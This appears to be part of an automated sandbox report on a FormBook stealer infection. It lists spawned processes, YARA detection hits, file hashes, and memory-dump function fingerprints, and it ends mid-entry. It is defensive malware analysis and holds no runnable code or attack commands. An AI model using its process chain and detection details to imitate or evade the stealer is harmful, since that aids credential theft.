                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:07:54:33
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe"
                                                            Imagebase:0xd10000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:17
                                                            Start time:07:54:35
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\SysWOW64\openfiles.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\openfiles.exe"
                                                            Imagebase:0xa40000
                                                            File size:60'416 bytes
                                                            MD5 hash:50BD10A4C573E609A401114488299D3D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:18
                                                            Start time:07:54:48
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe"
                                                            Imagebase:0xd10000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:19
                                                            Start time:07:54:53
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0x30000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:07:54:55
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                            Imagebase:0x7ff60e320000
                                                            File size:71'680 bytes
                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:21
                                                            Start time:07:55:00
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff73feb0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:22
                                                            Start time:07:55:01
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0x30000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00007FF88799B596 Relevance: .5, Instructions: 481COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076204875.00007FF887990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887990000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887990000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1e3b7777b456455aa6263002bedaa854d3fc06f493493f5b4ea02878182c531b
                                                              • Instruction ID: 6459f9dfbfa7cc7889004c75274d012fc771ac30367b010c32b25630d76fd544
                                                              • Opcode Fuzzy Hash: 1e3b7777b456455aa6263002bedaa854d3fc06f493493f5b4ea02878182c531b
                                                              • Instruction Fuzzy Hash: E3F19430918A8E8FEBA8DF28C8557E937E1FF55354F04426ED84DC7291CB38A945CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FF88799C342 Relevance: .5, Instructions: 462COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076204875.00007FF887990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887990000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887990000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c4886302d24dd6f755974fca8a43cb905576463c70596603d055ba85d8f6e637
                                                              • Instruction ID: 69baded0a4eb321274e340ffce2e12c2e10502b14554be96397c68cbc380e71b
                                                              • Opcode Fuzzy Hash: c4886302d24dd6f755974fca8a43cb905576463c70596603d055ba85d8f6e637
                                                              • Instruction Fuzzy Hash: 48E1A330908A8E8FEBA8DF28CC557F977E1FB55350F14426AD84DC7291DE78A941CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FF887A6415E Relevance: 1.6, Strings: 1, Instructions: 311COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076920188.00007FF887A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: b&
                                                              • API String ID: 0-2767624833
                                                              • Opcode ID: 2c17b48702399054868ec9915da8e4fb69d5575e1552c040393a29e0f73061dc
                                                              • Instruction ID: 67e4311d342a83d0b5ae5f297b1713c9104d331b4d5a1c536ce181b55a359940
                                                              • Opcode Fuzzy Hash: 2c17b48702399054868ec9915da8e4fb69d5575e1552c040393a29e0f73061dc
                                                              • Instruction Fuzzy Hash: B6A1E361E4DA8A4FE7A9DB2858526BC66F2FF55B90B6801BAC01DC31D2DF18F900C741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FF88799CAA0 Relevance: .3, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076204875.00007FF887990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887990000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887990000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30db1d3e0d14c87ba050bd5fea85e81e00f830551b7375e0f6a61eda4ad23482
                                                              • Instruction ID: c90fd8a51c3e498cdb83745e97076c368eef18836c1d44a8ace9faf5bb26093e
                                                              • Opcode Fuzzy Hash: 30db1d3e0d14c87ba050bd5fea85e81e00f830551b7375e0f6a61eda4ad23482
                                                              • Instruction Fuzzy Hash: 22812E70A1CA4A4FE798EB1CC885BB977E1FF95351B10057DD08AC3296D929FC46C741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FF887A64257 Relevance: .2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076920188.00007FF887A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aabda216f460b7a39514d148caea81acf26212875afcff66b8f1f17ec8d6dfd1
                                                              • Instruction ID: eabd1cd586eeec7185996556f2196b7d7c777621d910d0f243faa5e9455d50ff
                                                              • Opcode Fuzzy Hash: aabda216f460b7a39514d148caea81acf26212875afcff66b8f1f17ec8d6dfd1
                                                              • Instruction Fuzzy Hash: 9151C062D5DA864BE2A9D72858626BC6AF2FF55AE4B6801B9C05CC31D2DE18FD00C741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FF887A65429 Relevance: .1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076920188.00007FF887A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7540b1123efa664d48c2c1fd00869df213e6dc702dde3e146701a47280042c33
                                                              • Instruction ID: 5136970b780cd52874c7348e467a0490cbf29356528018e3cc987eb2d79f9c7e
                                                              • Opcode Fuzzy Hash: 7540b1123efa664d48c2c1fd00869df213e6dc702dde3e146701a47280042c33
                                                              • Instruction Fuzzy Hash: 9E112922D5DA9A1FF2F5D658281A1BC66E2FF557A1B6801FAD40CD31C3DD09BC008382
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FF887993945 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076204875.00007FF887990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887990000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887990000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                              • Instruction ID: 4d1bdf2cd6c7b782772ba3cef12691d8b5ab7d7588a456517f2beaabed9f544a
                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                              • Instruction Fuzzy Hash: B501A73011CB0D8FD744EF0CE455AA5B3E0FB85360F10052DE58AC3691D636E881CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 00007FF887993BFB Relevance: .1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2076204875.00007FF887990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887990000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ff887990000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52e9e326878bd00bf46b55bc1a943b98308f0c5119365de1a0b5adc22c74ed99
                                                              • Instruction ID: 90885f3e7ef4e49c160200757ac6bf3e35dc6d2f943e3997673a40099199ecff
                                                              • Opcode Fuzzy Hash: 52e9e326878bd00bf46b55bc1a943b98308f0c5119365de1a0b5adc22c74ed99
                                                              • Instruction Fuzzy Hash: 75317677A0C1A39FE210FBEDF8A59EA3B54DF9127A71801B7D1C8C5093D91C504B86A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Function 044EF258 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vwk
                                                              • API String ID: 0-1924164325
                                                              • Opcode ID: bdfd408d35431e5fbf63754e4f7dc68933cc7b8e5a170a72e43f99503d4a9fca
                                                              • Instruction ID: 2e8a074aa09a7010f845a130e88b25b68c80b0add4f99466772fb5e2ab1a7591
                                                              • Opcode Fuzzy Hash: bdfd408d35431e5fbf63754e4f7dc68933cc7b8e5a170a72e43f99503d4a9fca
                                                              • Instruction Fuzzy Hash: AFB17270E002199FDF14CFAAC8857EEBBF2AF88305F14852AD815E7354EB74A845CB55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044EFB28 Relevance: .3, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a902f1c1845cc7ecdd37e1d3b7958cd8cc97f8513fbc9f2ab50ebd344d6de202
                                                              • Instruction ID: 2beda52061a7789ad9d8d022914bba36b0ef95e216f619df1e599018a45e6cbc
                                                              • Opcode Fuzzy Hash: a902f1c1845cc7ecdd37e1d3b7958cd8cc97f8513fbc9f2ab50ebd344d6de202
                                                              • Instruction Fuzzy Hash: DAB17370E002099FDF14CFAAD8857AEBBF2BF48715F24852AD815E7354EB74A845CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044EB760 Relevance: 6.8, Strings: 5, Instructions: 522COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8Nwk$h]wk$h]wk$h]wk$Iwk
                                                              • API String ID: 0-3734436452
                                                              • Opcode ID: 9b349db4135aac72add75829b19f4877b6399ad84fda6b8e1de5d13653956e74
                                                              • Instruction ID: 322edb841118cc78278ba996204eb1add2a6ac7cf40fe0c7ab7222e564bd1af5
                                                              • Opcode Fuzzy Hash: 9b349db4135aac72add75829b19f4877b6399ad84fda6b8e1de5d13653956e74
                                                              • Instruction Fuzzy Hash: 04227134B006148FDB25EB65D894AAEB7B2FF89741F1444EAD409AB350DF35AD86CF80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044EC418 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: h]wk$Iwk
                                                              • API String ID: 0-2953020780
                                                              • Opcode ID: ad87fd4ad3f46f5a87f3ea8ecd8871799398603cecc4d806d4e34b8585058c79
                                                              • Instruction ID: 61606466e573219a1ed13215c85d82d31dabfdb6d4685422caa6ab68e7a90ecb
                                                              • Opcode Fuzzy Hash: ad87fd4ad3f46f5a87f3ea8ecd8871799398603cecc4d806d4e34b8585058c79
                                                              • Instruction Fuzzy Hash: 5B314030B001288FCF25EB64C8956EEB7B2AF49345F1444EAD409AB351CB35AE85CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044E3670 Relevance: .3, Instructions: 308COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 12ad70104b46a33088b397d3e7a67a7d2bff6949fc94325aa2038f4390d6d839
                                                              • Instruction ID: 09d26e4b52fb6093bf9918077af64c4ff33086553c50e2418000da276b98df83
                                                              • Opcode Fuzzy Hash: 12ad70104b46a33088b397d3e7a67a7d2bff6949fc94325aa2038f4390d6d839
                                                              • Instruction Fuzzy Hash: 21D10974A01249AFDB15CFA9D484AAEFBF2BF48314F25C15AE814AB351C735ED42CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044E8D38 Relevance: .3, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b79c967c741fb5a87f35a26d0b0c0e8bd2a21e95a2a4786e904d8cc91dab6b0
                                                              • Instruction ID: b409d0aadc8c1af1a946ad53689da5da1d0d016c557ab36d37b49c94f64056e9
                                                              • Opcode Fuzzy Hash: 4b79c967c741fb5a87f35a26d0b0c0e8bd2a21e95a2a4786e904d8cc91dab6b0
                                                              • Instruction Fuzzy Hash: FEA1A031A00208DFDF14EFA5D984AAEB7B2FF85311F15455AE806AB3A5DB34ED49CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044E8528 Relevance: .2, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ece85dbfb0db772bdefb1a8afd95765e0f29add052c80ee28d84e5312f592ae
                                                              • Instruction ID: db8f95fc8741610aa83488dbbe5585afaa703af32376b277c9da656ec30eab0d
                                                              • Opcode Fuzzy Hash: 4ece85dbfb0db772bdefb1a8afd95765e0f29add052c80ee28d84e5312f592ae
                                                              • Instruction Fuzzy Hash: E3919E30A012449FCF15EF65D8449AEBBF2FF89311F1885AAE445AB361DB35E886CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044EA2A0 Relevance: .2, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6161a11d3c920f389da33cbc4d6f0d16248c8dadf9b765e924ea9c1ab76e5100
                                                              • Instruction ID: 817d75ae8caf4129c3b30e9b629c027c12f7575a3ed164adb13655f41bf264e4
                                                              • Opcode Fuzzy Hash: 6161a11d3c920f389da33cbc4d6f0d16248c8dadf9b765e924ea9c1ab76e5100
                                                              • Instruction Fuzzy Hash: 2D61433550A3D55FDB03DF68D8605EA7FB0AF4722071A41D7D094EF2A3C6249D88CBAA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044E9488 Relevance: .2, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4742c35fe4696d8e5c68f6ad439a6bb00c6d181244ca58bf63827907821d3a6f
                                                              • Instruction ID: 187c21f6d905d8c380ecb17ef9c47e799f7b5d23fcb518e745413a04c8de742d
                                                              • Opcode Fuzzy Hash: 4742c35fe4696d8e5c68f6ad439a6bb00c6d181244ca58bf63827907821d3a6f
                                                              • Instruction Fuzzy Hash: 7A719071A006088FDB14DF69C884AAEBBF2BF85314F14896AD455EB790DB70EC46CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044E9219 Relevance: .1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e507ff46e83957e1ac50af43ea483cc9b54affe22947a730cc5b8e8803951903
                                                              • Instruction ID: 8524d8008c4c9094756fb1e1d739caeb2c43154245cc3489ae94d66e808849c3
                                                              • Opcode Fuzzy Hash: e507ff46e83957e1ac50af43ea483cc9b54affe22947a730cc5b8e8803951903
                                                              • Instruction Fuzzy Hash: 5D41D131B042008FDB19DF71C854ABEBBB2EF89755F09486AD402EB7A0CB70AC41CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044EA250 Relevance: .1, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d1543e35d643c357c3675a95478010574cd88a8c1958afc7ccaa16113cd59b1
                                                              • Instruction ID: 28f01daac847f5b1067fdc9efae5911f8111118810250982d596054ad45d87c3
                                                              • Opcode Fuzzy Hash: 3d1543e35d643c357c3675a95478010574cd88a8c1958afc7ccaa16113cd59b1
                                                              • Instruction Fuzzy Hash: 2A316F35A002499FCB01CF59D9809AAFBB1FF49320B25869AE445BB752C731FD81CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044E31C8 Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0030541fe47a3254c07a7be1c27c80278f7a6f38a3efa346b646057b649805ce
                                                              • Instruction ID: 48f237d4141e3c4424a6e041ef892c0ca078635f09890c000d23c5efaddc538a
                                                              • Opcode Fuzzy Hash: 0030541fe47a3254c07a7be1c27c80278f7a6f38a3efa346b646057b649805ce
                                                              • Instruction Fuzzy Hash: D4214C74A042199FCB01CF98D880AAAFBF1FF89310B158596D859EB352C731ED41CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02B8D01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927012816.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_2b8d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0d6e3402d5e1c3244c857cb3053eb37d08bdd70401220b261a9fa45616e19f5
                                                              • Instruction ID: 78a4256d984515261e9a39384aff55884d06b612d6c6acd6cc2de79d5bc73753
                                                              • Opcode Fuzzy Hash: a0d6e3402d5e1c3244c857cb3053eb37d08bdd70401220b261a9fa45616e19f5
                                                              • Instruction Fuzzy Hash: 1101F231108304ABE720AA35CC80BA7BBD8DF41234F08C49BED4C0B282C3799841CAB6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02B8D01C Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927012816.0000000002B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_2b8d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6661d93e3000554a3c63ea21cdac9ec5c52c9e0af4123c5918b82d8b25189880
                                                              • Instruction ID: ba8d6589279044126ef25e9dcfcee38ce08218b41e093a357a42a5698273b0a9
                                                              • Opcode Fuzzy Hash: 6661d93e3000554a3c63ea21cdac9ec5c52c9e0af4123c5918b82d8b25189880
                                                              • Instruction Fuzzy Hash: 54F0C271005344AFE7208A16CC84B63FFD8EB41234F18C45AED4C4F682C3799840CAB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044E2DBD Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.1927350123.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_44e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc4729993bb60e8c1f4752bb4bfd5a3fb8b6afbfeea97be3d8fed0c73f8588aa
                                                              • Instruction ID: d1005f0e47d4abe4e524a189df4fd4829fc8d633568b154fad6fc2aa508c0a0a
                                                              • Opcode Fuzzy Hash: cc4729993bb60e8c1f4752bb4bfd5a3fb8b6afbfeea97be3d8fed0c73f8588aa
                                                              • Instruction Fuzzy Hash: 3BF0F035A052449FCF06CB98C860AFEBB30FF89320B1481D6E119A72A2C333DC02CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 044E2D5E Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
